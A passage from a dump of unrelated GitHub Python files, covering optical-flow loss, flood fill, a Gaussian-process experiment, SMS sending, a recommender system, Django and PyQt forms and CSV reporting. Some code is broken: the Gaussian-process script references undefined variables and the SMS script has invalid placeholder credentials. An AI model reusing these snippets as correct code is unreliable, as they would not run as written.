'ApHVAC distr pumps energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC heat rej fans/pumps energy (kWh)')\r\n self.addCat('Building energy')\r\n # self.addMembertoCat('Building energy', 'ApHVAC DX cooling systems energy (kWh)') # remove from sum\r\n self.addMembertoCat('Building energy', 'ApHVAC distr fans energy (kWh)')\r\n self.addMembertoCat('Building energy', 'Lights Misc. A (kWh)')\r\n self.addMembertoCat('Building energy', 'Equip Misc. 
H (kWh)')\r\n self.addMembertoCat('Building energy', 'Other Process (kWh)')\r\n self.addMembertoCat('Building energy', 'MEC elevators energy (kWh)')\r\n self.saveCatFile()\r\n\r\n\r\n","repo_name":"juankosasih97/VEAttributeSelector","sub_path":"cList.py","file_name":"cList.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21939446612","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .flownet import resample\n\n\nclass Consistency(nn.Module):\n # Consistency loss for a pair of optical flow\n def __init__(self):\n super(Consistency, self).__init__()\n self.beta = 0.05\n self.weight = 0.001\n\n def L2_norm(self, x):\n return F.normalize(x, p=2, dim=1, eps=1e-12)#.unsqueeze(1)\n\n def forward(self, flow_fwd, flow_bwd, stage_num):\n devide = flow_fwd.get_device()\n alpha = torch.FloatTensor([1.5]).cuda(devide)\n\n bwd2fwd_flow_pyramid = resample(flow_bwd, flow_fwd)# From bwd coordinate to src coordinate\n fwd2bwd_flow_pyramid = resample(flow_fwd, flow_bwd)# From fwd coordinate to tgt coordinate\n #print(\"bwd2fwd_flow_pyramid\", bwd2fwd_flow_pyramid.size())\n fwd_diff = torch.abs(bwd2fwd_flow_pyramid + flow_fwd)# In src\n bwd_diff = torch.abs(fwd2bwd_flow_pyramid + flow_bwd)# In tgt\n #print(\"fwd_diff size = \", fwd_diff.size())\n fwd_consist_bound = self.beta * self.L2_norm(flow_fwd)\n bwd_consist_bound = self.beta * self.L2_norm(flow_bwd)\n #print(\"fwd_consist_bound = \", fwd_consist_bound.size())\n fwd_consist_bound = alpha.clone().detach()#torch.max(fwd_consist_bound, alpha).clone().detach()\n #bwd_consist_bound = torch.max(bwd_consist_bound, alpha).clone().detach()\n bwd_consist_bound = alpha.clone().detach()\n fwd_mask = (fwd_diff < fwd_consist_bound).float()# In src\n bwd_mask = (bwd_diff < bwd_consist_bound).float()# In tgt\n\n if stage_num == 2:\n flow_consistency_loss = self.weight/2 * \\\n (torch.sum(torch.mean(fwd_diff, dim=1, keepdim=True) * fwd_mask) + \\\n torch.sum(torch.mean(bwd_diff, dim=1, keepdim=True) * bwd_mask))\n #(torch.sum(torch.mean(fwd_diff, dim=1, keepdim=True))\n else:\n flow_consistency_loss = self.weight/2 * (\\\n torch.sum(torch.mean(bwd_diff, dim=1, keepdim=True)))\n return fwd_mask, bwd_mask, flow_consistency_loss\n","repo_name":"NIRteam/prediction","sub_path":"model/VPvI/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43705003346","text":"# Below lists details all 8 possible movements\r\nrow = [-1, -1, -1, 0, 0, 1, 1, 1]\r\ncol = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n\r\n\r\n# check if it is possible to go to pixel (x, y) from\r\n# current pixel. 
The function returns false if the pixel\r\n# has different color or it is not a valid pixel\r\ndef isSafe(M, x, y, target):\r\n return 0 <= x < len(M) and 0 <= y < len(M[0]) and M[x][y] == target\r\n\r\n\r\n# Flood fill using DFS\r\ndef floodfill(M, x, y, replacement):\r\n\r\n # get target color\r\n target = M[x][y]\r\n\r\n # replace current pixel color with that of replacement\r\n M[x][y] = replacement\r\n\r\n # process all 8 adjacent pixels of current pixel and\r\n # recur for each valid pixel\r\n for k in range(len(row)):\r\n\r\n # if the adjacent pixel at position (x + row[k], y + col[k]) is\r\n # a valid pixel and have same color as that of the current pixel\r\n if isSafe(M, x + row[k], y + col[k], target):\r\n floodfill(M, x + row[k], y + col[k], replacement)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # matrix showing portion of the screen having different colors\r\n M = [\r\n ['Y', 'Y', 'Y', 'G', 'G', 'G', 'G', 'G', 'G', 'G'],\r\n ['Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'G', 'X', 'X', 'X'],\r\n ['G', 'G', 'G', 'G', 'G', 'G', 'G', 'X', 'X', 'X'],\r\n ['W', 'W', 'W', 'W', 'W', 'G', 'G', 'G', 'G', 'X'],\r\n ['W', 'R', 'R', 'R', 'R', 'R', 'G', 'X', 'X', 'X'],\r\n ['W', 'W', 'W', 'R', 'R', 'G', 'G', 'X', 'X', 'X'],\r\n ['W', 'B', 'W', 'R', 'R', 'R', 'R', 'R', 'R', 'X'],\r\n ['W', 'B', 'B', 'B', 'B', 'R', 'R', 'X', 'X', 'X'],\r\n ['W', 'B', 'B', 'X', 'B', 'B', 'B', 'B', 'X', 'X'],\r\n ['W', 'B', 'B', 'X', 'X', 'X', 'X', 'X', 'X', 'X']\r\n ]\r\n\r\n # start node\r\n x, y = (3, 9) # having target color = \"X\"\r\n\r\n # replacement color\r\n replacement = 'C'\r\n\r\n # replace target color with replacement color using DFS\r\n floodfill(M, x, y, replacement)\r\n\r\n # print the colors after replacement\r\n for r in M:\r\n print(r)\r\n","repo_name":"anandkrthakur/AlgorithmsEveryProgrammerShouldKnow","sub_path":"12b. Flood Fill Algorithm_UsingDFS.py","file_name":"12b. 
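The recursive DFS above can hit Python's default recursion limit (roughly 1000 frames) on large grids. An equivalent iterative version with an explicit stack, reusing the same 8-direction offsets:

```python
def floodfill_iterative(M, x, y, replacement):
    row = [-1, -1, -1, 0, 0, 1, 1, 1]
    col = [-1, 0, 1, -1, 1, -1, 0, 1]
    target = M[x][y]
    if target == replacement:   # nothing to do; also prevents an endless loop
        return
    stack = [(x, y)]
    while stack:
        i, j = stack.pop()
        M[i][j] = replacement
        for k in range(8):
            ni, nj = i + row[k], j + col[k]
            if 0 <= ni < len(M) and 0 <= nj < len(M[0]) and M[ni][nj] == target:
                stack.append((ni, nj))
```

The target == replacement guard also covers the case where the start pixel already has the replacement color, which would recurse forever in the version above.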
Flood Fill Algorithm_UsingDFS.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26808556605","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_Item(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(290, 75)\n Form.setMinimumSize(QtCore.QSize(0, 0))\n self.formLayout = QtWidgets.QFormLayout(Form)\n self.formLayout.setObjectName(\"formLayout\")\n self.label_3 = QtWidgets.QLabel(Form)\n self.label_3.setObjectName(\"label_3\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_3)\n self.comboBox = QtWidgets.QComboBox(Form)\n self.comboBox.setObjectName(\"comboBox\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.comboBox)\n self.label_4 = QtWidgets.QLabel(Form)\n self.label_4.setObjectName(\"label_4\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_4)\n self.lineEdit_2 = QtWidgets.QLineEdit(Form)\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.lineEdit_2)\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate","repo_name":"sonochiwa/rkn-parser","sub_path":"item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33869209254","text":"from html.parser import HTMLParser\nimport re\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.in_header = False\n self.in_body = False\n self.in_p = False\n self.text = []\n self.error = False\n self.end = False\n\n def handle_starttag(self, tag, attrs):\n if tag == \"body\":\n self.in_body = True\n elif tag == \"header\":\n self.in_header = True\n elif self.in_body and tag == \"p\":\n self.in_p = True\n\n def handle_endtag(self, tag):\n if tag == \"body\":\n self.in_body = False\n elif tag == \"header\":\n self.in_header = False\n elif self.in_body and tag == \"p\" and self.in_p:\n self.in_p = False\n\n def handle_data(self, data):\n if self.in_body and not self.in_header and self.in_p and not self.end:\n if (re.search(\"[,.?!-;:\\\"'ЇїЄє ]*\", data)):\n if re.match(\"^©\", data.strip()):\n self.end = True\n else:\n self.text.append(data.strip())\n\n def get_text(self):\n return \" \".join(self.text)\n\n def get_error(self):\n return self.error\n\n\ndef prepare_data(url):\n parser = MyHTMLParser()\n try:\n response = urlopen(url)\n html_bytes = response.read()\n html = html_bytes.decode('utf-8')\n parser.feed(html)\n except UnicodeDecodeError:\n html = html_bytes.decode('windows-1251')\n parser.feed(html)\n except HTTPError:\n parser.error = True\n\n return parser\n","repo_name":"anna-maria21/diploma1","sub_path":"playground/services/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27449564688","text":"import torch\nimport tqdm\nimport gpytorch\nimport urllib.request\nimport os\nfrom math import floor\nimport pandas as pd\nimport numpy as np\nimport models.dgps as m\nfrom gpytorch.mlls import VariationalELBO, AddedLossTerm\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom gpytorch.mlls import 
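MyHTMLParser above gates handle_data() on nested boolean tag flags. A cut-down variant fed from a literal string instead of urlopen(), which makes the flag mechanics easy to test in isolation:

```python
from html.parser import HTMLParser

class PParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_body = False
        self.in_p = False
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == 'body':
            self.in_body = True
        elif self.in_body and tag == 'p':
            self.in_p = True

    def handle_endtag(self, tag):
        if tag == 'body':
            self.in_body = False
        elif tag == 'p':
            self.in_p = False

    def handle_data(self, data):
        if self.in_body and self.in_p:   # only keep text inside <body><p>
            self.text.append(data.strip())

p = PParser()
p.feed('<html><body><h1>skip</h1><p>keep this</p></body></html>')
assert p.text == ['keep this']
```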
DeepApproximateMLL\nfrom sklearn.utils import shuffle\nimport scipy.stats\nfrom scipy.special import inv_boxcox\nfrom utils.metrics2 import nlpd, rmse\n\nnum_epochs = 200\nnum_samples = 10\nnum_layers = 3\n\nprint('num_epochs = ', num_epochs)\nprint('num_samples = ', num_samples)\nprint('num_layers = ', num_layers)\n\n\nfilepath = 'data/uib_2000_2010_tp.csv'\n\ndf = pd.read_csv(filepath)\ndata = torch.Tensor(df.values)\n\nX = data[:394*5,:-1]\nX = X - X.min(0)[0]\nX = 2 * (X / X.max(0)[0]) - 1\ny = data[:394*5, -1]\ny_tr, bc_param = scipy.stats.boxcox(y + 0.001)\ny_tr = torch.Tensor(y_tr)\n\nstdy_tr, _ = torch.std_mean(y_tr)\nstdy, _ = torch.std_mean(y)\n\ntrain_n = 394*4\ntrain_x = X[:train_n, :].contiguous()\ntrain_y = y[:train_n].contiguous()\n\ntest_x = X[train_n:, :].contiguous()\ntest_y = y[train_n:].contiguous()\n\nif torch.cuda.is_available():\n train_x, train_y, test_x, test_y = train_x.cuda(), train_y.cuda(), test_x.cuda(), test_y.cuda()\n\ntrain_dataset = TensorDataset(train_x, train_y)\ntrain_loader = DataLoader(train_dataset, batch_size=1024, shuffle=True)\n\n\n#### Model\nif num_layers == 2:\n model = m.DeepGP2(train_x.shape)\nif num_layers == 3:\n model = m.DeepGP3(train_x.shape)\nif num_layers == 5:\n model = m.DeepGP5(train_x.shape)\n\nif torch.cuda.is_available():\n model = model.cuda()\n\n\n#### Training\noptimizer = torch.optim.Adam([\n {'params': model.parameters()},\n], lr=0.01)\nmll = DeepApproximateMLL(VariationalELBO(model.likelihood, model, train_x.shape[-2]))\n\nepochs_iter = tqdm.tqdm(range(num_epochs), desc=\"Epoch\")\nfor i in epochs_iter:\n # Within each iteration, we will go over each minibatch of data\n minibatch_iter = tqdm.tqdm(train_loader, desc=\"Minibatch\", leave=False)\n for x_batch, y_batch in minibatch_iter:\n with gpytorch.settings.num_likelihood_samples(num_samples):\n optimizer.zero_grad()\n output = model(x_batch)\n loss = -mll(output, y_batch)\n loss.backward()\n optimizer.step()\n minibatch_iter.set_postfix(loss=loss.item())\n\n\n#### Metrics\ndef negative_log_predictive_density(test_y, predicted_mean, predicted_var):\n # Vector of log-predictive density per test point \n lpd = torch.distributions.Normal(predicted_mean, torch.sqrt(predicted_var)).log_prob(test_y)\n # return the average\n return -torch.mean(lpd)\ndef sqrt_mean_squared_error(test_y, predicted_mean):\n return torch.sqrt(torch.mean((test_y - predicted_mean)**2))\n\n\ntest_dataset = TensorDataset(test_x, test_y)\ntest_loader = DataLoader(test_dataset, batch_size=1024)\n\n#### Metrics\nmodel.eval()\ntest_dataset = TensorDataset(test_x, test_y)\ntest_loader = DataLoader(test_dataset, batch_size=1024)\n\nmodel.eval()\nwith torch.no_grad():\n pred_y, y_means, y_var, test_lls = model.predict(test_loader)\n\n# Inverse transform predictions\n# pred_y_test_tr = torch.Tensor(inv_boxcox(pred_y_test, bc_param))\n# y_mean_raw = torch.Tensor(inv_boxcox(y_means, bc_param))\n# y_var_tr = torch.Tensor(inv_boxcox(y_var + y_mean, bc_param,)) - y_mean_tr\n# test_y_raw = torch.Tensor(inv_boxcox(test_y, bc_param))\n\n## Metrics\nrmse_test = rmse(y_mean_raw, test_y_raw, stdy)\nnlpd_test = nlpd(pred_y, test_y, stdy_tr).mean()\n\nprint(f\"RMSE: {rmse_test.item()}, NLPD: {nlpd_test.item()}\")\n\ndf1 = pd.DataFrame()\ndf1['pred'] = y_means.mean(axis=0)\ndf1['var'] = np.sqrt(_y_var.mean(axis=0))\ndf1['lat'] = data[:,2]\ndf1['lon'] = data[:,1]\ndf1.to_csv('data/DGP'+ 
str(num_layers)+'_uib_may2000.csv')\n\n\n","repo_name":"Stansfash/nonstationary-precip","sub_path":"experiments/spatiotemporal_dgp.py","file_name":"spatiotemporal_dgp.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9189056606","text":"from CCPRestSDK import REST\nimport configparser\n\n# Main account SID\naccountSid = xxxxx\n\n# Main account token\naccountToken = xxxxx\n\n# Application Id\nappId = xxxx\n\n# Request address, format as below; the http:// prefix is not needed\nserverIP = 'app.cloopen.com'\n\n# Port\nserverPort = '8883'\n\n# REST API version\nsoftVersion = '2013-12-26'\n\n# Workflow:\n# Ronglian Cloud (荣联云)\n# Register\n# Create an application\n# ACCOUNT SID\n# appid\n# AUTH TOKEN\n\n# Parameters\n# Send an SMS\n# @param to       phone number\n# @param datas    data content, an array such as {'12','34'}; no '' replacement needed\n# @param $tempId  template Id\n\ndef send_template_SMS(to, datas, tempId):\n    # Initialize the REST SDK\n    rest = REST(serverIP, serverPort, softVersion)\n    rest.setAccount(accountSid, accountToken)\n    rest.setAppId(appId)\n\n    return rest.sendTemplateSMS(to, datas, tempId)\n\n\nif __name__ == '__main__':\n    # phone number {verification code, valid for 3 minutes}\n    send_template_SMS(17316184506, {\"1234\", 3}, 1)\n","repo_name":"Illidan877/python","sub_path":"短信验证/YTXSDK/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14378139239","text":"from __future__ import print_function\nimport copy\nimport src.rs_model_src.ers as ers\nimport src.rs_model_src.feature_matrix_cl as feature_matrix_cl\nimport os\nimport scipy\nimport sys\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom pyfm import pylibfm\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import train_test_split, RandomizedSearchCV\nwarnings.filterwarnings('ignore')\n\nclass FM_RS():\n    def __init__(self, data, active_users):\n        self.data = data\n        self.active_users = active_users\n        self.n_folds = 3\n        self.__prepare_feature_matrix__()\n        self.__preset__()\n        self.__train__()\n\n    def __prepare_feature_matrix__(self):\n        \"\"\"\n        Prepare the feature matrix (user-item-ratings matrix).\n        - the feature matrix contains all unique encounters, excluding the active users, and is used to train the recommender system\n        - the feature matrix pivot contains all unique encounters plus the active users\n        Save the feature matrix, the feature pivot and the list of active users. The first two can be found in '/RecSys/feature_matrix', the last can be\n        located in '/RecSys/out/test/'\n        \"\"\"\n        #fname = r'./RecSys/feature_matrix/feature_matrix.csv'\n        #if os.path.isfile(fname) :\n        #    self.feature_matrix = pd.read_csv(fname)\n        #    fname = r'./RecSys/feature_matrix/feature_matrix_pivot.csv'\n        #    self.feature_matrix_pivot = pd.read_csv(fname)\n        #else:\n        object_um = feature_matrix_cl.FeatureMatrixClass(self.data, self.active_users)\n        self.feature_matrix, self.pivot = object_um.get_feature_matrix()\n        self.active_users.to_csv('./RecSys/out/test/au_list.csv', index=False)\n\n    def __preset__(self):\n        matrix = pd.DataFrame(columns=self.feature_matrix.columns)\n        for i, a_user in enumerate(self.active_users.encounter_id):\n            if not (self.feature_matrix.loc[self.feature_matrix['encounter_id'] == a_user].empty):\n                data = self.feature_matrix.loc[self.feature_matrix['encounter_id'] == a_user]\n                matrix = matrix.append(data)\n                self.feature_matrix = self.feature_matrix.drop(self.feature_matrix[self.feature_matrix.encounter_id == a_user].index)\n        self.matrix_test = matrix\n\n    def __split_data__(self):\n        #items = ['metformin', 'insulin']\n        item_id = pd.get_dummies(self.feature_matrix['item_id'], prefix=['item_id'], dtype=float)\n        y = self.feature_matrix['ratings'].to_frame()\n        dummy = self.feature_matrix.drop(['ratings', 'encounter_id'], axis=1)\n        df = pd.concat([item_id, dummy], axis=1, join='inner', sort=False)\n\n        X = df  # scipy.sparse.csr_matrix(df)\n        return train_test_split(X, y, test_size=0.25, random_state=42)\n\n    def areEqual(self, arr1, arr2, n, m):\n        # If the lengths differ, the arrays cannot be equal\n        if (n != m):\n            return False\n\n        # Sort both arrays\n        arr1.sort()\n        arr2.sort()\n\n        # Linearly compare elements (the range must include the last index)\n        for i in range(0, n):\n            if (arr1[i] != arr2[i]):\n                return False\n\n        # All elements were the same. 
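Even with the loop range fixed, areEqual above sorts both index arrays in place, and __validation__ later reads self.indices_X_val in that sorted order. A multiset comparison with collections.Counter checks the same property without mutating the inputs:

```python
from collections import Counter

def are_equal(arr1, arr2):
    # multiset equality, no side effects on the inputs
    return Counter(arr1) == Counter(arr2)

assert are_equal([3, 1, 2], [2, 3, 1])
assert not are_equal([1, 2], [1, 2, 2])
```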
\n return True\n\n def __train__(self):\n rmses_all = []\n maes_all = []\n models_all = []\n params_all=[]\n for i, fold in enumerate(np.arange(self.n_folds)):\n rmses = []\n models = []\n maes = []\n print('Factorization Machine')\n num_factors=[20,30,50,70,80]#np.arange(79,84)\n #num_iter=[20, 30, 40, 50, 60]\n initial_learning_rate=[0.001, 0.01, 0.005, 0.009, 0.003]\n params=[]\n print(\"\\rFOLD Loop {}/{}.\".format(fold+1, self.n_folds), end='\\r')\n print('-----------------------------------------------')\n sys.stdout.flush()\n #training_data =training_utility[initial:final]\n print('Cross validation in progress...')\n self.X_train, self.X_val, self.y_train, self.y_val = self.__split_data__()\n self.indices_X_val = np.asarray(self.X_val.index.values.tolist())\n self.indices_y_val = np.asarray(self.y_val.index.values.tolist())\n #print(self.X_train.indices.tolist())\n #print(len(self.X_train.indices.tolist()))\n n = len(self.indices_X_val)\n m=len(self.indices_y_val)\n if (self.areEqual(self.indices_X_val, self.indices_y_val, n, m)): \n print(\"Yes\") \n else: \n print(\"No\") \n dummy = self.X_train \n #print(dummy)\n #print(type(dummy.values))\n self.X_train = scipy.sparse.csr_matrix((dummy) ,dtype=float)\n dummy = self.X_val\n self.X_val = scipy.sparse.csr_matrix((dummy),dtype=float)\n dummy = self.y_train\n self.y_train = dummy.values.ravel()\n dummy = self.y_val\n self.y_val = dummy.values.ravel()\n #print(self.X_train)\n for i in np.arange(0,1):\n name = 'data_fold_'+str(fold+1) +'_loop_'+str(i)\n print('Starts training ------------------------------------------------------------')\n #i = np.random.randint(0,5)\n #j = np.random.randint(0,5)\n #k = np.random.randint(0,5)\n # Train a Factorization Machine\n #param ={'num_factors':num_factors[i], 'num_iter':num_iter[j], 'initial_learning_rate':initial_learning_rate[k]}\n param ={'num_factors':num_factors[i], 'initial_learning_rate':initial_learning_rate[i]}\n params.append(param)\n fm = pylibfm.FM(num_factors=num_factors[i], num_iter=50, verbose=True, task=\"regression\", \n initial_learning_rate=initial_learning_rate[i], learning_rate_schedule=\"constant\")\n fm.fit(self.X_train,self.y_train) #[0:2000]\n self.__saving_models__(fm,fold,i)\n\n #Validate a FM\n df_val, rmse, mae =self.__validation__(fm)\n self.__saving_pred_training__(df_val,fold,i)\n rmses.append(rmse)\n models.append(fm)\n maes.append(mae)\n #save_path = save_path+'metrics_results.csv'\n #self.__save_metrics__(rmses, maes, './RecSys/out/FM/train/', fold)\n rmses_all.append(rmses)\n maes_all.append(maes)\n models_all.append(models)\n params_all.append(params)\n self.__save_metrics__(rmses_all, maes_all, './RecSys/out/FM/train/', fold)\n self.best_fm = self.__best_model__(rmses_all, models_all,params_all)\n\n def __validation__(self, fm): \n preds = fm.predict(self.X_val)\n rmse, mae = self.__evaluation__(preds, self.y_val)\n preds_set = pd.DataFrame({'prediction': preds})\n indices_set = pd.DataFrame({'index': self.indices_X_val})\n df_val = pd.concat([indices_set, preds_set],axis=1, join='inner', sort=False)\n return df_val, rmse, mae\n \n def __evaluation__(self, preds, y_truth):\n \"\"\"\n Create an evaluation object for calculating the root mean square error (RMSE) and mean absolute error (MAE)\n \"\"\"\n mse = mean_squared_error(y_truth,preds)\n mae = np.mean(np.abs(y_truth - preds))\n print(\"FM MSE: %.4f\" % mse)\n rmse = np.sqrt(mse)\n return rmse, mae\n\n def __best_model__(self, mses,models, params):\n best_model_list = []\n best_param_list = []\n 
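__evaluation__ above computes MAE by hand and RMSE as the square root of MSE. sklearn ships a helper for the MAE half, and the two agree:

```python
import numpy as np
from sklearn.metrics import mean_squared_error, mean_absolute_error

y_true = np.array([3.0, 1.0, 2.0])
y_pred = np.array([2.5, 1.0, 2.5])

rmse = np.sqrt(mean_squared_error(y_true, y_pred))  # as in __evaluation__
mae = mean_absolute_error(y_true, y_pred)
assert np.isclose(mae, np.mean(np.abs(y_true - y_pred)))
print(rmse, mae)
```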
less_rmse_list = []\n best_model = None\n for i,rms in enumerate(mses):\n index_max = np.argmin(rms) #np.argmax(mses)\n best_model = models[i][index_max]\n best_param = params[i][index_max]\n print('The best model is: ',best_model)\n print('The best param is: ',best_param)\n best_model_list.append(best_model)\n best_param_list.append(best_param)\n less_rmse_list.append(rms)\n return best_model\n\n def __saving_models__(self, model,fold,i):\n filename = './RecSys/out/FM/models/model_'+str(fold+1)+'_loop_'+str(i)+'.sav'\n joblib.dump(model, filename)\n\n def __saving_pred_training__(self, df_val, fold,i):\n df_val.to_csv('./RecSys/out/FM/train/pred_'+str(fold+1)+'_loop_'+str(i)+'.csv')\n\n def __save_metrics__(self, rmses, maes, save_path, fold):\n \"\"\"\n Method for saving the errors RMSE and MAE\n \"\"\"\n metrics_results = pd.DataFrame(columns=['RMSE', 'MAE'])\n #rmse = np.mean(rmses)\n #mae = np.mean(maes)\n record = pd.Series([rmses, maes], index=['RMSE', 'MAE'])\n metrics_results = metrics_results.append(record, ignore_index=True)\n save_path = save_path+'metrics_results'+str(fold+1)+'.csv'\n metrics_results.to_csv(save_path, index=False)\n print(\"Metrics results can be found here: \" + save_path)\n\n def get_predictions(self):\n #items = ['metformin', 'insulin'\n item_id = pd.get_dummies(self.matrix_test['item_id'],prefix=['item_id'],dtype=float)\n y = self.matrix_test['ratings'].to_frame()\n dummy = self.matrix_test.drop(['ratings', 'encounter_id'], axis=1)\n df = pd.concat([item_id, dummy],axis=1, join='inner', sort=False)\n \n #indices = df.index.values.tolist()\n #print(indices)\n #X = scipy.sparse.csr_matrix((df, indices))\n X = scipy.sparse.csr_matrix(df, dtype = float)\n #print(X)\n preds = self.best_fm.predict(X)\n mse = mean_squared_error(y,preds)\n rmse = np.sqrt(mse)\n mae = mean_absolute_error(y,preds)\n print(\"FM MSE: %.4f\" % mse)\n #print(preds)\n preds_final = pd.concat([self.matrix_test.encounter_id, pd.DataFrame(preds)],axis=1, join='inner', sort=False)\n #pd.DataFrame(preds).to_csv('./RecSys/out/FM/results/pred_au.csv')\n preds_final.to_csv('./RecSys/out/FM/results/pred_au.csv', index=False)\n metrics_results = pd.DataFrame(columns=['RMSE', 'MAE'])\n #rmse, mae = self.__evaluation__(preds, y)\n record = pd.Series([rmse, mae], index=['RMSE', 'MAE'])\n metrics_results = metrics_results.append(record, ignore_index=True)\n metrics_results.to_csv('./RecSys/out/FM/results/metrics_au.csv', index=False)\n return preds_final\n \n\n ","repo_name":"pachecon/diabetic_medications_RecommenderSystem","sub_path":"src/rs_model_src/rs_model_FM.py","file_name":"rs_model_FM.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31842162445","text":"import sys \n\ndef write(x, y):\n print( \"%d %d\"%(x, y) )\n sys.stdout.flush()\n\ndef read():\n a = sys.stdin.readline().split()\n if len(a) == 3:\n exit()\n for i in range(665):\n sys.stdin.readline() \n\nx, y = map(int, input().split())\n \nwhile 1:\n read() \n \n if x < 500:\n x += 1\n if x > 500:\n x -= 1\n if y < 500:\n y += 1\n if y > 500:\n y -= 1\n \n write(x, y)\n\n if x == 500 and y == 500:\n break \n\np = []\nfor i in range(666):\n a = list(map(int, sys.stdin.readline().split()))\n p.append(a)\n\np1, p2, p3, p4 = 0,0,0,0\n\nfor i in p:\n x, y = i[0], i[1]\n if 1<=x<=499 and 1<=y<=499:\n p1+=1\n elif x>=501 and 1<=y<=499:\n p2+=1\n elif 1<=x<=499 and y>=501:\n p3+=1\n elif x>=501 and y>=501:\n p4+=1\n\nk = [p1, p2, p3, p4]\nif 
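The model files above are saved through sklearn.externals.joblib, which scikit-learn removed in version 0.23; the standalone joblib package exposes the same dump/load API:

```python
import joblib

model = {'num_factors': 20, 'initial_learning_rate': 0.01}  # any picklable object
joblib.dump(model, 'model_demo.sav')
assert joblib.load('model_demo.sav') == model
```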
min(k) == p1:\n dx, dy = 1, 1\nelif min(k) == p2:\n dx, dy = -1, 1\nelif min(k) == p3:\n dx, dy = 1, -1\nelse:\n dx, dy = -1, -1\n\n\nwhile 1:\n read()\n\n x += dx\n y += dy\n\n write(x, y)\n","repo_name":"ploffer11/Python3","sub_path":"534D.py","file_name":"534D.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16282037758","text":"from django import forms\n\nPRODUCT_QUENTITY_CHOICES = [(i, str(i)) for i in range(1,21)]\n\nclass CartAddProdcutForm(forms.Form):\n quentity = forms.TypedChoiceField( \n widget=forms.Select(attrs={\n 'style':\"width: 100px\",\n 'class':\"form-control\",\n 'aria-label':\"Search\",\n 'value':\"1\",\n 'type':\"number\",\n }),\n choices=PRODUCT_QUENTITY_CHOICES, coerce=int)\n update = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)","repo_name":"mahmoudabuelnaga/shoppy","sub_path":"cart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11349118536","text":"import json, collections, csv\n\nimport timestamp_utils, report_columns\nfrom snapshot import Snapshot\n\ndef all_measurement_names(snapshot_log):\n return set.union(*[set(snapshot.measurements.keys()) for snapshot in snapshot_log])\n\ndef merge_dicts(*args):\n answer = dict()\n for dd in args:\n answer.update(dd)\n\n return answer\n\ndef with_empty_cells_set_to_none(snapshots):\n all_nones = {measurement_name : None for measurement_name in all_measurement_names(snapshots)}\n\n def overlay_available_measurements(measurements):\n return merge_dicts(all_nones, measurements)\n \n return [snapshot.map_measurements(overlay_available_measurements) \\\n for snapshot in snapshots]\n\ndef flatten_by_timestamp(snapshots_log):\n by_timestamp = collections.defaultdict(dict)\n \n for snapshot in snapshots_log:\n timestamp = snapshot.timestamp\n measurements = snapshot.measurements\n \n for measurement_name, measurement_result in measurements.iteritems():\n by_timestamp[timestamp][measurement_name] = measurement_result\n\n timestamps_in_order = sorted(by_timestamp.keys())\n return [Snapshot(timestamp, by_timestamp[timestamp]) for timestamp in timestamps_in_order]\n\ndef compute_observations(observables, snapshots):\n def compute_all_observables(measurements):\n answer = {}\n for observable in observables:\n if observable.measurement.name not in measurements:\n continue\n \n measured_input = measurements[observable.measurement.name]\n answer[observable.name] = observable.transformation(measured_input)\n return answer\n \n return [snapshot.map_measurements(compute_all_observables) for snapshot in snapshots]\n\ndef write_csv(snapshots, output_file):\n writer = csv.writer(output_file, delimiter=',')\n\n available_columns = all_measurement_names(snapshots)\n column_names = [x for x in report_columns.columns_in_order if report_columns.our_name_for(x) in available_columns]\n writer.writerow(['timestamp'] + column_names)\n\n for row in snapshots:\n values = row.measurements\n timestamp_str = timestamp_utils.to_string(row.timestamp)\n line = [timestamp_str] + [values[report_columns.our_name_for(name)] for name in column_names]\n writer.writerow(line)\n\ndef 